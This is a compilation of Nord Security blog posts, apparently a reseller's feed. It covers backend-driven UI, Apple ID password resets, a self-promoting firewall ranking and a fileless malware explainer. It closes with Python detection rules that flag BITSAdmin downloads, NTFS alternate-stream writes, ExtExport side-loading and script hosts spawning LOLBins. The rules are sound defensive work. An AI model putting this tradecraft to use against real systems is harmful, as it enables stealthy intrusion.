  • Backend-driven UI allows us to unify our client approach because this state can be used to populate any client, whether it’s mobile, desktop, or otherwise. This way, users get new features at the same time, regardless of what client they’re using. In terms of development, this helps developers across various teams follow a similar workflow.

  • Easier A/B testing. All we need to focus on is how to deliver different states based on user feedback, and with that, we can get really flexible when conceptualizing and experimenting with new UIs.

The cons of backend-driven UI

Uneven developer distribution

As mentioned before, every useful software development approach will have downsides. Implementing backend-driven UI means migrating all logic from the frontend. Naturally, this will result in higher workloads for backend developers. Keeping that in mind, does the usual developer distribution change when using this approach? Generally, yes, but this ultimately depends on the product/app/service you’re building. Some are already more backend-heavy than others.

Workload will vary depending on the stage of implementation. When starting with backend-driven UI, designing the architecture, agreeing on the contract, and executing the switch is heavily dependent on all engineers. Questions mostly arise when the migration is complete. From then on, backenders will have bigger workloads.

High cost

The upfront cost of introducing backend-driven UI can be significant. When making a UI reliant only on the state provided to it, the implementation can quickly become overcomplicated. This impacts the pace of development. It’s not an easy task, but we’re trading high upfront costs for being faster and more flexible in the future.

You should first consider whether this approach is even useful for your specific business. Spotify popularized this approach because it wanted the ability to experiment fast and flexibly with novel UI features. But if you’re building an admin panel, does it need to be backend-driven? Will the interface change a lot, or will you be conducting A/B tests for the users? Implementing BDUI should align with your tech setup and business goals.

Sanity check: Is BDUI for you?

With the pros and cons in mind, let’s address some common questions:

How much should you commit initially?

Backend-driven UI doesn’t need to replace the entire system. You can also take a modular approach when determining viability. As an example, you can identify specific parts of the application that you could make backend-driven. The banner example that we discussed above could be something to start with. If that works, try it out on a more challenging feature like a table or carousel.

Are we inventing HTML again?

Avoid being too detailed. Taking a simple feature like a text box, we could go overboard and start thinking about allowing different text colors, size changes, or other modifications…  But then we’d come dangerously close to CSS and HTML, which is certainly not the goal! Remember: Enable backend-driven UI using general components, not detailed blocks.
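To make the UI = fn(state) idea from the earlier section concrete, and to show what “general components, not detailed blocks” looks like in code, here is an added example in Python; it is not NordLayer’s code, and the component schema (a type plus a few fields per type), the page state, and the allowed action names are all constructed for illustration. The renderer maps an ordered list of JSON components to markup, accepts only types that exist in the design system, treats every text field as data by escaping it, and produces an A/B variant by changing the state alone.

```python
import html
import json

# Constructed page state: an ordered list of coarse components. Reordering or
# adding entries here is a redesign that needs no client redeployment.
PAGE_STATE = json.dumps([
    {"type": "banner", "text": "Scheduled maintenance <tonight> at 02:00 UTC"},
    {"type": "heading", "text": "Welcome back"},
    {"type": "button", "label": "Renew plan", "action": "renew"},
    {"type": "marquee", "text": "ignored: not in the design system"},
])

# Actions are a closed vocabulary too; the client decides what each one does.
ALLOWED_ACTIONS = {"renew", "dismiss", "noop"}

# Each renderer reads only the fields it declares; every text field is escaped,
# so the backend supplies content, never markup (no HTML reinvented here).
def _banner(c):
    return '<div class="banner">%s</div>' % html.escape(c.get("text", ""))

def _heading(c):
    return "<h1>%s</h1>" % html.escape(c.get("text", ""))

def _button(c):
    action = c.get("action", "")
    if action not in ALLOWED_ACTIONS:
        action = "noop"
    return '<button data-action="%s">%s</button>' % (
        html.escape(action), html.escape(c.get("label", "")))

COMPONENTS = {"banner": _banner, "heading": _heading, "button": _button}

def render(state_json):
    """UI = fn(state): map the state's component list to markup, in order.

    Returns (markup, skipped_types). Unknown component types are skipped and
    reported rather than rendered, so a bad state degrades instead of breaking.
    """
    components = json.loads(state_json)
    if not isinstance(components, list):
        raise ValueError("state must be a list of components")
    rendered, skipped = [], []
    for c in components:
        fn = COMPONENTS.get(c.get("type")) if isinstance(c, dict) else None
        if fn is None:
            skipped.append(c.get("type") if isinstance(c, dict) else None)
            continue
        rendered.append(fn(c))
    return "\n".join(rendered), skipped

def variant(state_json, banner_text):
    """Produce an A/B variant by changing only the state, never the renderer."""
    components = json.loads(state_json)
    for c in components:
        if isinstance(c, dict) and c.get("type") == "banner":
            c["text"] = banner_text
    return json.dumps(components)

if __name__ == "__main__":
    markup, skipped = render(PAGE_STATE)
    print(markup)
    print("skipped component types:", skipped)
    print(render(variant(PAGE_STATE, "Variant B banner"))[0].splitlines()[0])
```

The allowlist in COMPONENTS is where the “are we inventing HTML again?” question gets answered in practice: the backend can only choose among components the design system already defines, and a new visual capability is a client release, not a state change.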

Do we have the foundation to implement a backend-driven UI?

Do you have a design system? As we said above, being too detailed will cause problems. With a design system in place, we have a very clear direction on where to go. Development becomes very logical as long as our frontend can handle our designed components. Everyone uses the same components to describe UIs: Whether you’re a mobile developer, frontender, or designer, we all speak the same language. A button means the same component across different contexts.

Big Tech and backend-driven UI

Most of this article’s content is based on findings from Lyft, Spotify, Airbnb, and others. These are huge companies with the resources to make backend-driven UI a reality.

And even though BDUI can be a pricy upfront investment that requires developer redistribution, its long-term benefits – including flexibility and faster adaptation to user feedback – are a huge upside for many teams, products, and apps.

Read more about engineering at Nord Security.

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

Forgot your Apple ID password? Here is how you can reset it.

Before you reset your Apple ID password

Before you go about resetting or changing your Apple ID password, it’s important to have all the necessary information for the process. Here’s what you’ll need:

  • Email address: Make sure you have access to the email address that you’ve used with your Apple ID.

  • Security questions: Have answers ready to any security questions if required.

  • Multi-factor authentication (MFA): If you’ve enabled MFA, ensure you have access to the trusted device or phone number.

  • Recovery email or phone number: If you’ve set up a recovery email or phone number, ensure you can access it.

On top of that, it is also crucial to note that Apple has a set of specific requirements for passwords, including:

  • A password has to be at least eight characters long.

  • A password must include a number.

  • A password must include both uppercase and lowercase letters.

How to reset your Apple ID password on iPhone and iPad

  1. Go to “Settings” and tap on your name.

  2. Select “Sign-In & Security.”

  3. Tap “Change password.”

  4. Enter your device’s passcode. Then, enter your new password and confirm it.

  5. Tap “Change” or “Change Password.”

How to reset your Apple ID password on a Mac

  1. Click on Apple’s logo at the top left of your screen.

  2. Select “System Preferences” and click on your name.

  3. On the left, select “Sign-In & Security.”

  4. In the next window, select “Change password.”

  5. You will need to enter your device’s password.

  6. You will be able to enter your new password in the next window. Then, select “Change” and “Done.”

How to reset your Apple ID password online

  1. Go to appleid.apple.com

  2. Click “Sign in” and select “Forgot password?”

  3. Enter your email address or phone number, enter the CAPTCHA code, and click “Continue.”

  4. You will receive a prompt to change your password on one of your Apple devices.

If you don’t have the device with you, you will have to either answer security questions or confirm your identity via email. If you are unable to do that, you will be asked to enter the 2FA recovery key to reset your password. You can create a new password only after you’ve confirmed your identity.

How to reset your Apple ID on a new device

  1. During the setup of a new Apple device, you will be asked to enter your Apple ID.

  2. Select “Forgot password or don’t have an Apple ID?”

  3. Finish the setup of a new device.

  4. As soon as the setup is complete, select an app that requires you to sign in to your Apple ID. On iPhone, iPad, or Apple Watch, you can simply select Messages. On a Mac, follow the instructions above.

What to do if the standard Apple ID reset methods haven’t worked for you

In case the outlined methods for resetting or changing your Apple ID password don’t work for you, there are still a few alternative strategies you can try. These methods can help you recover your account and regain access to all your Apple devices and services.

  • Check for devices already signed in with your Apple ID: If you have other Apple devices already signed in with your Apple ID, you can use one of those devices to reset your password. This can often be the quickest solution since it allows you to bypass additional verification steps.

  • Use recovery information: When setting up your Apple ID, you may have provided a recovery email address or phone number. If so, Apple can send you a verification code or reset link to help you regain access to your account.

  • Contact Apple Support: If you’ve tried the above methods without success, reaching out to Apple Support is your next best option. Apple Support can assist you in verifying your identity and recovering your account. While this might take a bit more time, it’s a reliable way to resolve the issue.

Best practices for managing and securing your passwords

To avoid the frustration of forgetting your Apple ID password in the future, we highly recommend adopting strong password management practices.

Create strong, complex passwords

Whenever you’re creating a password for a website, app, or service, remember that a strong password is a password that’s at least eight characters long and includes a healthy mix of uppercase and lowercase letters, numbers, as well as special characters. During password creation, it is also important to avoid using any easily guessable information such as your name or birthdate. If you’re looking for inspiration and practical tips for creating a strong and complex password, check out our Five Strong Password Ideas post.

Enable multi-factor authentication (MFA)

Beyond strong passwords, enabling multi-factor authentication (MFA) can further secure your accounts. MFA provides an extra layer of security by requiring a second form of verification in addition to the traditional username and password combination. This could be a code sent to your phone, a biometric scan, or a prompt on a trusted device.

Use a password manager

Finally, managing multiple strong passwords can be challenging and quite frustrating. This is where a password manager like NordPass can come in handy. NordPass simplifies password management and life online in general by offering a single secure place to safely store it all: passwords, passkeys, credit cards, personal information, secure notes, and more. On top of that, NordPass is designed to automatically save and fill in your credentials when you need to log in, saving you time and reducing the risk of password fatigue. NordPass for iOS even allows you to sync your passwords across all your devices, ensuring you have access to your digital valuables whenever, wherever. Even when you’re offline.

Start using passkeys instead of passwords

Passkeys are a new, convenient, and phishing-resistant way to sign up for and access apps, websites, and other various online services. In essence, a passkey is a digital login credential that uses your device—be it a phone, laptop, tablet, or desktop—to authenticate you instead of a traditional combination of a username and password. Cybersecurity experts see passkeys as the future of authentication technology, which will inevitably replace passwords. Tech giants such as Microsoft, Google, and Apple already allow users to opt for passkey-based authentication on their services. If you want to take your access security to the next level, we highly advise moving toward passkey-based authentication. To learn the ins and outs of setting up and using passkeys on your Apple devices, be sure to check out our latest blog entry on that exact topic.

By adopting these practices into your routine, you’ll significantly reduce the risk of unauthorized access to your accounts and minimize the stress of managing multiple passwords. Not only will your Apple ID be more secure, but you’ll also have the peace of mind of knowing that all your online accounts are protected.

About NordPass
NordPass is developed by Nord Security, a company leading the global market of cybersecurity products.

10 best network firewall solutions for businesses

Since the first commercial firewall in 1991, network security needs and technology have evolved significantly. While many businesses still use hardware firewalls, the rise of virtual network firewalls has made it easier to achieve the same functionality without the maintenance and complexity of physical firewalls.

Software firewalls offer effective network protection in a simpler, easier-to-manage way compared to hardware options. This article reviews our top 10 picks for software network firewalls to help you choose the best one for your business.

How we chose the best network firewall solutions (in our opinion)

We selected a range of network firewall options, from large enterprise solutions through products for mid-size businesses with similar features, to smaller vendors that may not be as developed but still provide strong functionality. We didn’t go into too many details, but we focused on how well each firewall strengthens network security and how easy its user interface makes it to set rules. We also looked at the overall benefits of each firewall vendor and what types of clients they suit, as well as cost-effectiveness and how comprehensive these solutions are.

We checked reviews and user feedback on sites like Gartner, G2, Reddit, and Capterra. We focused on what users said about cost, performance, next-generation firewalls, feature reliability, and how helpful the support teams were. If we found unusual feedback about a specific firewall provider that users often mention, we included it as well.

Top 10 network firewall solutions, in our opinion

Different solutions suit different business types. Here’s a detailed look at our favorite network firewall solutions available today, listed in no particular order:

  • NordLayer

  • Cato SASE Cloud

  • Fortinet: FortiGate VM

  • Palo Alto VM Series

  • Cloudflare WAF

  • Zscaler Internet Access

  • Appgate SDP

  • Perimeter 81 (Check Point Harmony SASE)

  • Todyl

  • Banyan Security

1. NordLayer

NordLayer is a network security solution that offers secure access to company resources from any location. It helps protect networks, enables remote work, and provides the tools necessary to comply with key regulatory frameworks. Developed by Nord Security, the creators of NordVPN, NordLayer offers a multi-layered defense and features typical of next-generation firewalls (NGFW).

NordLayer enables organizations to implement Firewall as a Service (FWaaS) along with Zero Trust Network Access (ZTNA), and Secure Web Gateway (SWG) principles.

How NordLayer Cloud Firewall works

Five ways NordLayer Cloud Firewall can help:

  1. Prevent data leaks. Network segmentation is key in access control. Without it, data leaks are more likely.

  2. Achieve compliance. Many standards focus on network access control and protection of network and encrypted traffic.

  3. Implement security strategy. Best practices include secure access service edge (SASE), FWaaS, SWG, and ZTNA.

  4. Unify security across hybrid setups. Securing a mix of data centers, cloud, and on-premise systems can be challenging, but NordLayer helps simplify this.

  5. Support hybrid work models. NordLayer strengthens security for remote teams while managing network firewalls across locations.

NordLayer’s flexibility makes it ideal for businesses of all sizes that need scalable network protection. It provides secure internet access, resource protection, and compliance with major cybersecurity regulations.

Apart from Cloud Firewall, NordLayer offers other security features like:

  • Quantum-safe encryption

  • Dedicated servers with Fixed IP

  • Device Posture Security

  • IP allowlisting

  • Web protection (formerly ThreatBlock)

  • DNS filtering

  • NordLynx VPN protocol

  • Browser extension for secure browsing

Benefits:

  • Transparent pricing, starting at $7 per user per month

  • Proactive setup support

  • 24/7 live support with dedicated account managers

  • Direct user feedback influences product development

Drawbacks:

  • Less known compared to other competitors

  • Fewer security features than large enterprise firewall vendors

  • Possible slowdowns with the use of VPN

  • Reducing team size requires reaching out to support

  • Occasional confusion between NordVPN and NordLayer

Disclaimer: This product review is based on information provided on our website, VPN review sites and social networking forums such as Gartner, G2, and TechRadar, as well as customer feedback shared on these platforms, accessed on September 6, 2024.

2. Cato SASE Cloud

Cato Networks is an Israeli company that offers Secure Access Service Edge (SASE) technology. The platform combines communication and security in a cloud-based solution. Founded in 2015, Cato Networks now employs over 900 people globally. When it comes to the firewall, users frequently mention that the solution is easy to set up, with straightforward firewall rule management and affordability. It simplifies firewall management and offers features typical of NGFW.

Most mentioned overall product benefits:

  • Comprehensive security features

  • Complete management panel for easy user control

  • Low-latency performance through numerous points of presence (PoPs)

  • Reliable, with no impact on internet speed or application performance

  • Automatic firewall updates

  • Agile and scalable solution

Drawbacks:

  • Can be difficult to implement

  • License costs are high

  • Logs and reports are hard to interpret

  • VPN licenses must be purchased in packs of 10

  • Sometimes the app fails to log in

  • Upgrading bandwidth capacity for a site can be costly

Disclaimer: This product review is based on information provided on the company’s website, VPN review sites and social networking forums such as Gartner and G2, and it assesses customer feedback shared on these platforms, accessed on September 6, 2024.

3. Fortinet: FortiGate VM

Fortinet, founded over 20 years ago in Sunnyvale, California, provides cybersecurity solutions for a wide range of users. FortiGate VM—a virtual firewall—offers network protection in private, public, and telco cloud environments. Running on the same OS as FortiGate hardware, it enforces consistent security policies across hybrid setups.

Most mentioned overall product benefits:

  • User-friendly interface

  • Straightforward setup and management of virtual machines

  • Easy integration in virtual environments

  • Works well with multivendor environments, including IaaS and public clouds

Drawbacks:

  • More advanced tutorials or documentation needed

  • Complex configurations

  • Some interface complexities

  • High entry pricing

  • Logging and reporting issues

  • Problems integrating with certain XDR solutions

  • Sizing virtual environments could be clearer

Disclaimer: This product review is based on information provided on VPN review sites and social networking forums such as G2, and it assesses customer feedback shared on these platforms, accessed on September 6, 2024.

4. Palo Alto VM Series

Palo Alto Networks is a multinational cybersecurity company based in Santa Clara, California. Its platform includes advanced network firewalls and cloud-based solutions that cover various aspects of security. The company serves over 70,000 organizations worldwide. Users praise the firewall’s strong security features, ease of use, and flexibility, which are on par with those of on-premises network firewalls.

Most mentioned overall product benefits:

  • Easy deployment

  • Flexible and scalable

  • Effective for disaster recovery

  • Centralized management

  • User-friendly interface

Drawbacks:

  • High pricing

  • Licensing complexity

  • Long upgrade and restart times

  • Documentation could be improved

  • Occasional performance slowdowns

  • Limited integrations with some cloud platforms

  • Resource-intensive solution

Disclaimer: This product review is based on information provided on the company’s website, VPN review sites and social networking forums such as Gartner and G2, as well as customer feedback shared on these platforms, accessed on September 6, 2024.

5. Cloudflare WAF

Cloudflare is an American company that offers content delivery networks, cloud cybersecurity, DDoS mitigation, and domain services. As of 2024, over 19% of the internet uses it for web security. Its Web Application Firewall (WAF) features managed rulesets that are frequently updated, geolocation blocking, and proxy detection, making it highly effective in preventing man-in-the-middle attacks. Users also note its useful integrations, such as with Azure AD and Google Cloud.

Most mentioned overall product benefits:

  • Easy installation

  • Simple to monitor with actionable features

  • Extremely effective with customizable options

  • User-friendly interface

  • Straightforward to use

Drawbacks:

  • Hard for small businesses to negotiate pricing and add features

  • Limited configurations in the Terraform provider

  • Implementing network-based rules through code is difficult

  • Documentation lacks specific, in-depth configurations

  • Some false positives in traffic blocking, though fixable over time

  • Slow customer support responses

  • Limited flexibility in rate-limiting rules for APIs

  • Load balancing requires an additional license

Disclaimer: This product review is based on information provided on the company’s website, VPN review sites and social networking forums such as Gartner and Reddit, and it assesses customer feedback shared on these platforms, accessed on September 6, 2024.

6. Zscaler Internet Access

Established in 2007 and headquartered in San Jose, California, Zscaler provides a cloud-native Zero Trust Exchange platform that secures internet-bound traffic and controls access to applications. It offers cloud-delivered protection against cyber threats and data loss. As for its firewall features, users point out that Zscaler offers a broad range of security tools and flexible options, making it adaptable to cloud-based setups.

Most mentioned overall product benefits:

  • Scalable

  • Consistent and stable connectivity

  • Efficient centralized management for access and security oversight

  • Robust cloud-native infrastructure

  • Intuitive interface for users

  • High-performance security solution

Drawbacks:

  • Complicated migration from traditional VPN to Zero Trust Network Access

  • Steep learning curve for new users

  • URL misclassifications that affect protection measures

  • Disconnects during brief internet interruptions

  • Inadequate API documentation

  • Slow customer service response

  • Lengthy setup and configuration process

  • Confusing pricing structure for features and services

Disclaimer: This product review is based on information provided on VPN review sites and social networking forums such as Gartner and G2, as well as customer feedback shared on these platforms, accessed on September 6, 2024.

7. Appgate SDP

Appgate, founded in 2020 and based in Coral Gables, Florida, provides security solutions for organizations and government agencies. It focuses on Universal Zero Trust Network Access (ZTNA) and fraud protection. As for the firewall functionality, users mention that Appgate SDP is straightforward to manage with helpful troubleshooting documentation.

Most mentioned overall product benefits:

  • Stable performance

  • Fast operation

  • Easy to deploy and manage

  • Clear documentation for troubleshooting

  • Real-time updates based on risk metrics

  • Micro-segmented access to resources

  • Intuitive user interface

Drawbacks:

  • Runs on Ubuntu Server, which is not frequently updated

  • Per-site licensing increases overall costs

  • Slow connection speeds to remote sites

  • Occasional resource reduction despite steady internet bandwidth

  • Complex to configure

  • Limited log management features

  • Dashboard is not very helpful for security monitoring

  • Frequent need to restart due to slow connection despite good internet

  • Insufficient dashboard information for identifying node connectivity issues

  • Centralized management lacks efficiency

Disclaimer: This product review is based on information provided on VPN review sites and social networking forums such as Gartner and G2, as well as customer feedback shared on these platforms, accessed on September 6, 2024.

8. Check Point Harmony SASE (formerly Perimeter 81)

Check Point Software Technologies offers solutions to protect businesses and governments. Founded in 1993, it employs over 6,000 people and protects more than 100,000 organizations. Check Point Harmony SASE, formerly known as Perimeter 81, combines network and endpoint security for a unified approach. As for the firewall capabilities, users note easy troubleshooting due to log visibility and VPN tunnel stability.

Most mentioned overall product benefits:

  • Smooth migration with easy configuration of necessary features

  • Smart Console is user-friendly and free of software bugs

  • Unified platform integrating network and endpoint security

  • Proactive threat prevention and real-time monitoring

  • Simplified management with enhanced visibility across the IT environment

  • Reliable performance

  • Useful logging activity in the dashboard

Drawbacks:

  • Unable to establish redundant VPN tunnels with cloud environments

  • Support failed to detect misconfiguration, leading to significant downtime

  • Complex initial setup, steep learning curve for new users

  • Integration challenges with third-party vendors

  • High pricing structure

  • Difficulty getting timely technical support

  • Frustration with poor customer service and unresolved issues

  • Issues with overbilling and slow responses from the support team

  • Logging activity is unreliable, with users questioning its accuracy

Disclaimer: This product review is based on information provided on VPN review sites and social networking forums such as Gartner and G2, as well as customer feedback shared on these platforms, accessed on September 6, 2024.

9. Todyl

Founded in 2015 and headquartered in Denver, Colorado, Todyl offers a cybersecurity platform designed for MSPs and MSSPs. The platform provides comprehensive security solutions through a single-agent model, allowing businesses to customize capabilities to meet their needs. Users frequently note that Todyl’s integration and ease of deployment stand out as key features.

Most mentioned overall product benefits:

  • Easy to use

  • Top-notch support

  • Intuitive interface

  • Simple integration and deployment

  • All-in-one solution for clients

  • Centralized logs in the SIEM

  • Flexible licensing options per device and customer

Drawbacks:

  • Simultaneous use with Defender may cause reporting issues

  • Lacks custom gauge creation for dashboards

  • Missing GRC features

  • Setup can sometimes be tricky

  • Occasional bugs with the SGN Connect agent disappearing from the system tray

  • Web filtering can be clumsy

  • Marketing strategies have upset users

  • Platform lacks maturity

  • Connecting to on-premise devices like servers is difficult

  • Site-to-site connection often disconnects

  • Hard to cancel the service

  • Frequent DNS issues and workarounds needed

Disclaimer: This product review is based on information provided on VPN review sites and social networking forums such as G2 and Reddit, as well as customer feedback shared on these platforms, accessed on September 6, 2024.

10. Banyan Security

Banyan Security, recently acquired by SonicWall, provides a Zero Trust Network Access (ZTNA) solution focused on securing remote access to applications and resources. It is known for strong visibility and auditing features along with a user-friendly experience.

Most mentioned overall product benefits:

  • Good visibility and auditing features

  • Easy to use

  • More affordable than competitors

Drawbacks:

  • Integration challenges

  • Higher costs for some features

  • False positives in security alerts

  • Some rough edges in the platform

Disclaimer: This product review is based on information provided on VPN review sites and social networking forums such as Gartner, G2, Capterra and Reddit, as well as customer feedback shared on these platforms, accessed on September 6, 2024.

Key features to look for in a firewall

Focus on features that provide strong network protection while meeting the specific needs of your business. The right firewall solution should offer visibility, easy integration, and scalability to ensure nothing gets misconfigured as your company grows:

  1. Visibility and control. A good firewall solution needs to provide deep insight into your network traffic and applications, especially for businesses needing access control to meet regulations. Next-generation firewalls with strong threat intelligence can help you stay compliant.

  2. Easy integrations. Ensure the firewall provider offers solutions that integrate well with the systems you already run, such as deep packet inspection or intrusion prevention tools, identity management, and your data centers. It should strengthen your overall network security by fitting smoothly alongside your other security controls.

  3. Updates and maintenance. Choose firewall vendors that provide regular updates and proactive product development. Focus on solutions that are frequently updated, well-maintained, and show consistent growth. Providers should offer public release notes, regular updates, and clear communication with customers. It’s crucial to ensure that security features stay current. Automated updates and clear versioning also reduce manual work for IT teams.

  4. Hybrid network support. If your business operates across both on-premises and cloud setups, choose a firewall solution that supports hybrid infrastructures.

  5. Scalability. As your business grows, your firewall solution should scale without significant cost increases. For example, as your setup becomes more complex, you’ll need more firewall rules. It’s wise to check the number of rules included in each plan before purchasing, as the cost difference between plans can sometimes be steep. This helps maintain strong network protection as your infrastructure expands.

When picking a firewall, focus on features that offer strong security and fit your setup. Prioritize solutions with automation features to reduce manual work. It will save time and help manage security across complex infrastructures.

How to choose the best firewall for your business

When picking the right firewall for your company, you need to weigh several important factors:

  1. Security needs. Start by assessing your network security risks. If you’re a larger organization facing more threats, choose a next-generation firewall with a strong intrusion prevention system, advanced threat intelligence, and encryption to protect sensitive data across all layers. Smaller businesses should focus on essential features like packet filtering, malware defense, and network monitoring without overcomplicating the setup. Make sure the firewall solution aligns with the size and complexity of your network to avoid unnecessary costs or gaps in protection.

  2. Ease of use. The firewall should be easy to deploy and manage, especially if your IT resources are limited. Network firewalls with simple, user-friendly interfaces can reduce the time spent on managing network protection. Opt for solutions that offer automation for tasks like network traffic monitoring, deep packet inspection, and access control to save time.

  3. Support. Reliable customer support is crucial when setting up and maintaining a firewall. A firewall vendor that provides 24/7 support ensures issues are resolved quickly, minimizing downtime. If your business uses data centers or hybrid cloud setups, look for a vendor that offers proactive support to avoid misconfigurations and keep your security features running smoothly.

  4. Cost. While the price is important, consider the long-term value. Cheaper options may lack the scalability and advanced features you’ll need as your business grows. Make sure the solution can scale with your business, especially if you expand your data centers or cloud environments, without incurring hefty costs when upgrading.

  5. Compatibility. Ensure the firewall integrates seamlessly with your existing infrastructure, whether it’s cloud services, VPNs, or identity management systems. A firewall that works well with other security tools, such as intrusion prevention systems and threat management platforms, strengthens your overall network security and prevents integration issues.

  6. Performance and scalability. As your business grows and network traffic increases, your firewall must be able to handle the additional load without sacrificing performance. Whether securing sensitive resources or managing remote access, the firewall should maintain consistent network protection and scale efficiently to meet your evolving needs.

Overall, different firewall solutions suit different business needs. Large options like Fortinet and Palo Alto are ideal for enterprises. Mid-sized businesses may find NordLayer or Check Point Harmony SASE (formerly Perimeter 81) effective, while Todyl targets MSPs and MSSPs. Smaller options like Banyan Security fit smaller budgets. Choose based on your security needs and resources.

Disclaimer: The information in this article is provided for informational purposes only. It is based on publicly available third-party reviews, user feedback, and online sources accessed on September 6, 2024, and should not be considered definitive or permanent. While we strive for accuracy and completeness, Nord Security Inc. and its affiliates make no guarantees regarding the information’s accuracy, completeness, or suitability. We do not undertake, warrant, or represent that any product, or its feature, is or will remain publicly regarded as better or worse than other alternatives, serve any purpose, has mentioned features, benefits, strengths, and limitations for any period of time. Product features, pricing, and other details may change, and we advise readers to verify these directly with vendors. We disclaim any liability to any party for any errors, omissions, or actions taken based on this information. The inclusion of competitor products does not imply affiliation or endorsement, and all trademarks mentioned are the property of their respective owners. Readers should conduct their research and seek independent advice before making purchasing decisions.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

What is fileless malware and how to protect yourself

Some forms of malware are more sophisticated than others, using different methods of compromise or evasion. Ransomware, wipers, viruses, and worms are all designed to intrude on unsuspecting victims’ systems to steal, damage, or destroy their data.

Fileless malware is one of the most evasive types: it operates only within a computer’s memory, leaving little or no footprint on the hard drive.

With such a method of execution, does it mean that our devices are left vulnerable? Not quite.

What is fileless malware?

Many malware families work the same way: when you open a malicious attachment, you unknowingly let its code run on your machine, where it acts without your knowledge.

Consequently, the code can infest different parts of the system, install other payloads such as keyloggers or other spyware, block access to files or apps, display malicious ads, and more. Think of it as a regular program that’s installed on your PC, just acting against your interests.

Fileless malware is different. Rather than being stored on the computer’s drive as an executable that must be installed and launched, it does its malicious work only once loaded into random-access memory (RAM), and it gets there by abusing legitimate programs already on the system. With no malicious file on disk to find, it is harder to detect: its footprint exists almost entirely in memory.

Essentially, fileless malware manipulates existing processes and tools for its own ends instead of running as a separate, standalone program, and it can be harder to remove because it hides within, and abuses, system features such as the Windows registry.

Did you know? The fileless beginning of viruses

The first computer virus for the PC, the Brain virus, infected floppy diskette boot sectors only, not files. Dating back to 1986, it was followed by many other floppy diskette (and hard disk drive) boot sector infectors such as Form, and hard disk drive master boot record infectors such as Stoned and Michelangelo. None of these were ever contained in any file on the disk volume’s file system; they lived in system areas of the disk that were normally inaccessible to users, and then in memory once a system booted from infected media.

But you might ask, “Alright, but I still need to download it somewhere, no?” And you’d be right: in-memory ‘fileless’ malware is still delivered via malicious links or attachments; it is the execution that differs, because fileless malware is built to evade detection as much as it can.

Examples of fileless malware

A well-known example of fileless malware in use was the Astaroth campaign (detected by ESET as Guildma), which used a fileless method (process injection) to run an infostealer originally delivered through a malicious email link. Once the victim clicked, the malware used legitimate Windows tools such as BITSAdmin, NTFS Alternate Data Streams, and an Internet Explorer utility (ExtExport.exe) for defense evasion (through DLL side-loading).

In essence, it leveraged legitimate system processes and tools to run its code, so it only becomes detectable once it is running in memory (where ESET detects it as Win32/Spy.Guildma).

Similarly, the Kovter malware family, first detected by ESET Research in 2014, stored its malicious payload encrypted in the Windows registry, a technique regarded as fileless persistence. Likewise, GreyEnergy made sure that some of its modules ran only in memory, hindering detection.

Such techniques are a problem for simple endpoint security software that works only by scanning files on disk and lacks process or memory scanning. But that doesn’t mean they cannot be detected.
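
The Astaroth (Guildma) chain above can be caught from behaviour even when no malicious file ever touches disk, because its living-off-the-land steps still leave process-creation telemetry. The following is an added example, not ESET’s code or detection logic: a small rule set run over constructed, Sysmon-style process-creation events (the field names, paths and the 203.0.113.5 address are assumptions) that flags BITSAdmin used as a downloader, a write into an NTFS alternate data stream, ExtExport.exe launched from outside its Internet Explorer directory, and a script host spawning those tools, then correlates hits by parent process so that a chain stands out from a single, possibly benign, hit.

```python
"""Behaviour-based detection of living-off-the-land tradecraft (added example, not ESET's code).

Input: constructed, Sysmon-style process-creation events. The field names,
paths and the 203.0.113.5 address are assumptions made for this example.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# bitsadmin switches that fetch or stage a file; legitimate admin use rarely needs them from a script host
BITS_DOWNLOAD = re.compile(r"(?:^|\s)/(?:transfer|download|addfile)\b", re.IGNORECASE)
# a Windows path followed by ':streamname', i.e. an NTFS alternate data stream used as a target
ADS_TARGET = re.compile(r'[A-Za-z]:\\[^:\s"]+:[\w$.-]+')
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
LOLBINS = {"bitsadmin.exe", "cmd.exe", "powershell.exe", "regsvr32.exe", "wmic.exe"}


def rule_bitsadmin_download(ev: ProcEvent) -> bool:
    return _basename(ev.image) == "bitsadmin.exe" and bool(BITS_DOWNLOAD.search(ev.command_line))


def rule_ads_write(ev: ProcEvent) -> bool:
    return bool(ADS_TARGET.search(ev.command_line))


def rule_extexport_sideload(ev: ProcEvent) -> bool:
    # Assumption: the legitimate binary lives under the Internet Explorer install directory;
    # a copy anywhere else (a user-writable folder) is the DLL side-loading setup.
    return _basename(ev.image) == "extexport.exe" and "\\internet explorer\\" not in ev.image.lower()


def rule_script_host_spawns_lolbin(ev: ProcEvent) -> bool:
    return _basename(ev.parent_image) in SCRIPT_HOSTS and _basename(ev.image) in LOLBINS


RULES = [
    ("bitsadmin_download", rule_bitsadmin_download),
    ("ads_write", rule_ads_write),
    ("extexport_sideload", rule_extexport_sideload),
    ("script_host_spawns_lolbin", rule_script_host_spawns_lolbin),
]


def detect(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires, in rule order."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


def correlate(events: list[ProcEvent]) -> dict[str, list[str]]:
    """Group hits by parent process; a parent with two or more distinct rules is a chain worth escalating."""
    by_parent: dict[str, set[str]] = defaultdict(set)
    for idx, name in detect(events):
        by_parent[events[idx].parent_image].add(name)
    return {parent: sorted(names) for parent, names in by_parent.items() if len(names) >= 2}


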